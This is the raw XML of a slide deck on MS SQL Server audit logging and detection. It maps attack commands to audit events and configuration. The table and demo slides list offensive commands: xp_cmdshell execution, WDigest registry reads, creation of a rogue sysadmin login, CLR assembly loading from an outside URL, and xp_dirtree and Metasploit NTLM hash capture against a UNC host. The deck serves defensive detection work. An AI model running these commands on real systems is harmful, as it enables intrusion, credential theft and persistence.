          <ac:chgData name="Tristan Bennett" userId="052abb89-ed03-42c6-b080-2837d058e754" providerId="ADAL" clId="{06A0288A-E894-4E48-B1E9-F7DD4CD7DF7C}" dt="2023-06-12T07:47:13.791" v="918" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3767746587" sldId="273"/>
            <ac:cxnSpMk id="18" creationId="{95C05F5C-DE55-CA09-6544-9EAFC13A609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8913C-63EA-441C-8DCB-ADBC3E28BE0F}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/09/2023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5C5FB-1A60-461D-B5B1-FFBD975E139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80377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AU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>github.com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/mike-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>nolan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-councilman/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ms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en-AU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>-auditing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F5C5FB-1A60-461D-B5B1-FFBD975E1390}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>72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2385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678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7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8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3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7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22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544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14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76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12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747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626F98-F213-4034-8836-88A71501D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61061F-546B-0D2A-0D3C-CF49916846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02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B3DAACF-D844-4480-94BE-2DE00ABEE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75199" y="726177"/>
            <a:ext cx="5241603" cy="5343721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 5325805 w 5325805"/>
              <a:gd name="connsiteY0" fmla="*/ 2714782 h 5429563"/>
              <a:gd name="connsiteX1" fmla="*/ 2611024 w 5325805"/>
              <a:gd name="connsiteY1" fmla="*/ 5429563 h 5429563"/>
              <a:gd name="connsiteX2" fmla="*/ 1942188 w 5325805"/>
              <a:gd name="connsiteY2" fmla="*/ 5429563 h 5429563"/>
              <a:gd name="connsiteX3" fmla="*/ 668836 w 5325805"/>
              <a:gd name="connsiteY3" fmla="*/ 5429563 h 5429563"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 5325805"/>
              <a:gd name="connsiteY4" fmla="*/ 5429563 h 5429563"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 5325805"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 5429563"/>
              <a:gd name="connsiteX6" fmla="*/ 668836 w 5325805"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 5429563"/>
              <a:gd name="connsiteX7" fmla="*/ 1942188 w 5325805"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 5429563"/>
              <a:gd name="connsiteX8" fmla="*/ 2611024 w 5325805"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 5429563"/>
              <a:gd name="connsiteX9" fmla="*/ 5325805 w 5325805"/>
              <a:gd name="connsiteY9" fmla="*/ 2714782 h 542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25805" h="5429563">
                <a:moveTo>
                  <a:pt x="5325805" y="2714782"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5325805" y="4214114"/>
                  <a:pt x="4110356" y="5429563"/>
                  <a:pt x="2611024" y="5429563"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1942188" y="5429563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668836" y="5429563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5429563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668836" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1942188" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2611024" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4110356" y="0"/>
                  <a:pt x="5325805" y="1215450"/>
                  <a:pt x="5325805" y="2714782"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom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234BA-D04F-AD33-BEF2-91339E9DC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6431"/>
            <a:ext cx="9144000" cy="2452680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MS S.Q.L</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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39939-87BC-6B60-0602-89F0E6FBE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8856" y="4254411"/>
            <a:ext cx="4054288" cy="1069144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Super Quality Logs</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33124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010B63-5962-FB47-D934-742EE80B9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21" y="189088"/>
            <a:ext cx="5638114" cy="647982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1C0E55-FFAC-4A79-3A6E-A6E75715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236" y="1267692"/>
            <a:ext cx="5852287" cy="4890693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388685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14043-47B7-E21A-C9DD-D287FCC14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74" y="187079"/>
            <a:ext cx="9948052" cy="648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640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2327082" y="1653872"/>
            <a:ext cx="7537836" cy="2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8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Default Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="138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40664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10D62F2-E4C8-FABD-DDEE-3E8A74BD1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75" y="161014"/>
            <a:ext cx="2117032" cy="653597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3120887" y="2041497"/>
            <a:ext cx="8537049" cy="2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No Security Audits</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="54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No Database Audit Specifications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No Server Audit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381308133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FBDC60-5A1D-7A9D-26E1-3FBE90297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005" y="304639"/>
            <a:ext cx="6597989" cy="6248721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="571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653600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2327082" y="1653872"/>
            <a:ext cx="7537836" cy="2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8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What We Built</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="138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07574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DB1B30-B74D-4981-DDC8-C1C28F812276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3356444" y="853771"/>
            <a:ext cx="5479111" cy="5150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Documentation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Detections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Attack Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="72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0894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0" y="1653872"/>
            <a:ext cx="12192000" cy="2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8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Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="138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3163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1827475" y="180892"/>
            <a:ext cx="8537049" cy="1230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Configuration – Server Audit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F674E5-FA59-90A0-3EF8-1BD522900D8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3600947" y="1533837"/>
            <a:ext cx="6278550" cy="203132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b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="848BBD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-- Create and Enable Audit Policies</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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USE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master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AUDIT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SQL_Audit_SI</a:t>
            </a:r>
          </a:p>
          <a:p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APPLICATION_LOG </a:t>
            </a:r>
          </a:p>
          <a:p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(QUEUE_DELAY </a:t>
            </a:r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F97E72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, ON_FAILURE </a:t>
            </a:r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SERVER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AUDIT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SQL_Audit_SI</a:t>
            </a:r>
          </a:p>
          <a:p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FEDE5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GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BBBBBB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32EC4-1550-BDA9-438C-019927891A84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3089083" y="3840480"/>
            <a:ext cx="8181891" cy="2214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Sets the name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Points logs to the “Application” log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Turns on the logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="44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0544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1827475" y="180892"/>
            <a:ext cx="8537049" cy="1230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Configuration – Server Audit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17DE6-0F08-5321-E45D-59D27F4EE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787" y="1357465"/>
            <a:ext cx="5078424" cy="523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840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663392" y="396064"/>
            <a:ext cx="10865216" cy="1520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EXEC master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="72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xp_cmdshell</a:t>
            </a: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'whoami</a:t>
            </a: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'</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="54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3DE353-DD5C-93BD-65CF-B29CDA4D0204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594361" y="2010604"/>
            <a:ext cx="11392592" cy="38623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85800" indent="-685800">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§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Tristan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Log Enthusiast at        Seamless Intelligence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="54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github.com</a:t>
            </a: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/mike-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="54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nolan</a:t>
            </a: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-councilman/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="A white and blue square with a blue dot&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A638F41-1CE1-F7A8-A67E-33B5B941A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483" y="3626429"/>
            <a:ext cx="683030" cy="70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82972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1" y="180892"/>
            <a:ext cx="12192000" cy="1230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Configuration – Database Audit Specifications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48F64-A603-9A3B-81C4-5A58FF46F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0" y="1500870"/>
            <a:ext cx="11681340" cy="452789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9735438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1" y="180892"/>
            <a:ext cx="12192000" cy="1230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Configuration – Database Audit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963AA-72F8-5326-3709-853BD3FC3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248" y="1448995"/>
            <a:ext cx="3683503" cy="500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64520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1" y="180892"/>
            <a:ext cx="12192000" cy="1230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Configuration – Database Audit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6DCDB9-280B-338C-C95D-EAB01A74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40" y="1411357"/>
            <a:ext cx="9484519" cy="515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8390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1" y="180892"/>
            <a:ext cx="12192000" cy="1230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Configuration – Server Audit Specifications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3E01D-A3A7-4480-F23A-D02A4171A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1623638"/>
            <a:ext cx="11349318" cy="397869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5095144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1" y="180892"/>
            <a:ext cx="12192000" cy="1230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Configuration – Server Audit Specifications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7CF20-B0D1-E081-3612-61F17F6D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59" y="1472524"/>
            <a:ext cx="9184479" cy="483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114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BC41B-EFF2-775A-DD17-F2356872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6" y="895348"/>
            <a:ext cx="11798428" cy="50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7618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A191B-6110-EE6C-17EB-EE6F588D9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38" y="97403"/>
            <a:ext cx="2180819" cy="66631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A2D64E-CF00-5272-A516-2C12D3DA1441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3120887" y="2041497"/>
            <a:ext cx="8537049" cy="2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Security Audits</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="54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Audit Specifications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Server Audit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410188830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0" y="1653872"/>
            <a:ext cx="12192000" cy="2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8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Documentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="138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828219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1827475" y="166977"/>
            <a:ext cx="8537049" cy="719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Documentation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EBBAD7E-BFE5-6072-071C-4BC08B725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57475"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="648928" y="1070881"/>
          <a:ext cx="10894144" cy="5465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754">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2215531897"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="835754">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="629512518"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2704789">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2441712898"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2556284">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2806530112"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1313778">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3674845444"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2647785">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="543949978"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23859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Category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Tool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Command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Monitoring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Config Scope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1100" b="1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Config</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="1100" b="1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41862"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="164104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Initial Access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sqsh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sqsh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-S 192.168.3.22 -U corp1\\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tboss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-P admin123!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Linked to other detections.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Server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GUI based config for server logons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2850950383"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="164104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Discovery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sqsh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select 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sysobjects.name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from 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sysobjects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where name like '%mail%'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Query - sysobjects - mail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(SELECT ON OBJECT::[sys].[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sysobjects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2231114099"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="651759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Discovery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msfconsole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use auxiliary/admin/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mssql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/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mssql_enum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Database - Query - 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sys.configurations</a:t>
                      </a:r>
                      <a:b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Database - Stored Procedure - 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xp_regread</a:t>
                      </a:r>
                      <a:b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Database - Query - master..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sysdatabases</a:t>
                      </a:r>
                      <a:b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Database - Query - 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sys.syslogins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(SELECT ON OBJECT::[sys].[configurations]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b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(EXECUTE ON OBJECT::[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xp_regread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b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(SELECT ON OBJECT::[sys].[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sysdatabases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b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(SELECT ON OBJECT::[sys].[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sql_logins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534343362"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="164104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Discovery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sqsh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select * from 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sys.database_principals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;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Query - sys.database_principals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(SELECT ON OBJECT::[sys].[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database_principals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2087494629"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="651759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Discovery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PowerUpSQL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Invoke-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SQLDumpInfo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-Verbose -Instance "192.168.3.22,1433"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Query - sys.database_principals</a:t>
                      </a:r>
                      <a:b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Query - sys.configurations</a:t>
                      </a:r>
                      <a:b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Query - sys.server_principals</a:t>
                      </a:r>
                      <a:b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Stored Procedure Execution - xp_regread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(SELECT ON OBJECT::[sys].[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database_principals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b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(SELECT ON OBJECT::[sys].[configurations]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b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(SELECT ON OBJECT::[sys].[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server_principals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b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(EXECUTE ON OBJECT::[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xp_regread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3573775344"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="32665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Discovery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PowerUpSQL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Get-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SQLDomainController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-Instance "192.168.3.22,1433"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Query - sys.servers</a:t>
                      </a:r>
                      <a:b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Stored Procedure Execution - xp_regread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(SELECT ON OBJECT::[sys].[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sysservers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b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(EXECUTE ON OBJECT::[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xp_regread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2737312982"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="164104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Discovery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sqsh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select loginname from master.sys.syslogins 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Query - sys.syslogins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ADD (SELECT ON OBJECT::[sys].[sql_logins] BY [dbo])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112522615"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="48920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Discovery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sqsh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EXECUTE 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master.sys.xp_regread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'HKEY_LOCAL_MACHINE', 'SYSTEM\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CurrentControlSet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\Control\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SecurityProviders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\WDigest', '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UseLogonCredential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';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Database - Stored Procedure Execution - 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xp_regread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(EXECUTE ON OBJECT::[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xp_regread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3689917057"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="164104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Discovery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PowerUpSQL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Get-SQLServerInfo -Verbose -Instance "192.168.3.22,1433"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Stored Procedure Execution - xp_regread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ADD (EXECUTE ON OBJECT::[dbo].[xp_regread] BY [dbo])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273357972"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="32665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Execution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PowerUpSQL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Invoke-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SQLOSCmdOle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-Verbose -Command "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nltest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" -Instance "192.168.3.22,1433"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Config Changed - sp_configure - ole automation</a:t>
                      </a:r>
                      <a:b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Stored Procedure Execution - sp_oacreate wscript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(EXECUTE ON OBJECT::[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Sp_oacreate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b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(EXECUTE ON OBJECT::[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sp_configure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3796501035"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="48920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Credential Access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PowerUpSQL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Invoke-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SQLAuditWeakLoginPw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-Verbose -Instance "192.168.3.22,1433"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Query - sys.server_principals</a:t>
                      </a:r>
                      <a:b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User Enumeration</a:t>
                      </a:r>
                      <a:b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Server - Internal User Enumeration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(SELECT ON OBJECT::[sys].[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server_principals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2943638963"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="32665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Credential Access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PowerUpSQL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Get-SQLAgentJob -Verbose -Instance "192.168.3.22,1433"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Query - sysprocesses - SQL Agent</a:t>
                      </a:r>
                      <a:b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Query - sysjobs - Job Enumeration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MSDB DATABASE AUDIT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(EXECUTE ON OBJECT::[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sp_add_job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 </a:t>
                      </a:r>
                      <a:b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(SELECT ON OBJECT::[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sysjobs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19398458"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="164104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Execution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sqsh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EXEC </a:t>
                      </a:r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sp_addsrvrolemember</a:t>
                      </a:r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'hacker12345', 'sysadmin'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Stored Procedure - sp_addsrvrolemember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1760573718"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="489208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Execution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SQLRecon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SQLRecon.exe -a Windows -s 192.168.3.22 -m clr -o https://www.seamlessintelligence.com.au/hax/sql4.dll -f CustomFunctionName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Stored Procedure Execution - sp_add_trusted_assembly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(EXECUTE ON OBJECT::[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sp_add_trusted_assembly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4121554588"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="164104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Privilege Escalation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sqsh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exec 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master.dbo.xp_dirtree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'\\10.1.1.60\any\thing'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Database - Stored Procedure Execution - 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xp_dirtree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(EXECUTE ON OBJECT::[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xp_dirtree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2444912204"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="326656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Persistence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sqsh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CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!';EXEC sp_addsrvrolemember 'hacker', 'sysadmin'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Local Account Creation</a:t>
                      </a:r>
                      <a:b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</a:br>
                      <a:r>
                        <a:rPr lang="en-GB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Database - Stored Procedure Execution - sp_addsrvrolemember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AU" sz="900" u="none" strike="noStrike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900" b="0" i="0" u="none" strike="noStrike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(EXECUTE ON OBJECT::[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sp_addsrvrolemember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9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9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/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1488232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8327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1827475" y="166977"/>
            <a:ext cx="8537049" cy="719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Documentation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57D081-8FD4-468A-F160-7B4CF753F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95277"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1188056" y="1406181"/>
          <a:ext cx="9601864" cy="47427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98294">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="846092996"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5603570">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1966295374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algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-AU" sz="3200" b="1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Category</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="3200" b="1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Privilege Escalation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1310" marR="1310" marT="13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25299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AU" sz="3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Tool</a:t>
                      </a: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sqsh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32547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3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Command</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="3200" b="1" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/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exec </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="18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master.dbo.xp_dirtree</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="18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 '\\10.1.1.60\any\thing'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1608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3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Monitoring</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="3200" b="1" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/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Database - Stored Procedure Execution - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="18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xp_dirtree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1378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3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Config Scope</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="3200" b="1" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/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MASTER DATABASE AUDIT</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="18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868368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3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Config</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="3200" b="1" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/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ADD (EXECUTE ON OBJECT::[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="18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18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].[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="18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xp_dirtree</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="18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 BY [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" u="none" strike="noStrike" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Bahnschrift SemiBold Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>dbo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Bahnschrift SemiBold Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>])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Bahnschrift SemiBold Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0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852912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3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Event ID</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="3200" b="1" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/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EVID 33205 : SQL Audit Event - SI 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926593"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="962716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GB" sz="3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Attack Chain Comments</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="3200" b="1" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Bahnschrift SemiBold Condensed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marL="1310" marR="1310" marT="131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The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="18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xp_dirtree</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Bahnschrift SemiBold Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Stored Procedure can be abused to leak the NTLM hash of the account running the SQL service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877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6895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2327082" y="1653872"/>
            <a:ext cx="7537836" cy="2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8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SQL Logging in 2023?</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="138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085337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1827475" y="166977"/>
            <a:ext cx="8537049" cy="719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Documentation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DCF90-6068-68FE-FDBC-B4ACAE1DF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390" y="1000068"/>
            <a:ext cx="6067217" cy="569095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7223895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1827475" y="166977"/>
            <a:ext cx="8537049" cy="719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Documentation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8C9BE-3A36-A4E9-4627-1932ED20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747" y="1407954"/>
            <a:ext cx="7338503" cy="4042091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5020071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2327082" y="927540"/>
            <a:ext cx="7537836" cy="460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Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Detections</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-AU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74324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199C287-9833-9090-5E98-8AD6F0503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91" y="250988"/>
            <a:ext cx="9762617" cy="6356024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1806162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E56E63-79D8-DAE9-4DCF-617A4170F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618" y="350480"/>
            <a:ext cx="7552764" cy="624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8483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58B0E-B9B5-7326-7CE4-311CFA70D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83" y="284629"/>
            <a:ext cx="7074834" cy="62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6134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C40340-7413-5816-4C9F-6D4B76D8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291" y="438033"/>
            <a:ext cx="7179418" cy="598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9863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CE9C9-2284-3306-7874-448BDFCA0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542" y="309282"/>
            <a:ext cx="7536915" cy="62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0743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0EDC9-F738-F461-008A-7CA4F71FA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257" y="441512"/>
            <a:ext cx="7641486" cy="5974976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9504504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DB1B30-B74D-4981-DDC8-C1C28F812276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2355057" y="853771"/>
            <a:ext cx="7481885" cy="5150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Stored Procedure Use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SQL Queries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Authentication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Others </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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(Config Change, Privilege Change)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="72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60856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9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8632BCF-8891-B595-E6A6-23B9AE2AF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706" y="174861"/>
            <a:ext cx="3307743" cy="256496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B2639B-1087-C8AB-C9DA-514472ED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323" y="5362271"/>
            <a:ext cx="8274475" cy="1320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60C69B-4386-3030-7B92-F614B7DAE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4" y="230520"/>
            <a:ext cx="6473031" cy="3769901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8B9D6-B4EF-5AC3-3FD5-B975182D4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579" y="2912051"/>
            <a:ext cx="7301149" cy="2176740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0762147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2327082" y="1653872"/>
            <a:ext cx="7537836" cy="2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8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Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="138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43155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-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dirtree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DF1F0-A26C-79B4-B9A8-01B8CEF8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789" y="1207041"/>
            <a:ext cx="6300421" cy="4960676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92679761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-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dirtree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9049C6-6178-E757-BE96-7F89681DFD45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="961464" y="1692132"/>
            <a:ext cx="1026907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 auxiliary/admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" err="1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mssql</a:t>
            </a:r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AU" sz="2800" dirty="0" err="1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mssql_ntlm_stealer</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E2E8E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PASSWORD admin#123</a:t>
            </a:r>
          </a:p>
          <a:p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RHOSTS 192.168.3.22</a:t>
            </a:r>
          </a:p>
          <a:p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SMBPROXY 10.1.1.60</a:t>
            </a:r>
          </a:p>
          <a:p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USERNAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" err="1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tboss</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E2E8E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USE_WINDOWS_AUTHENT true</a:t>
            </a:r>
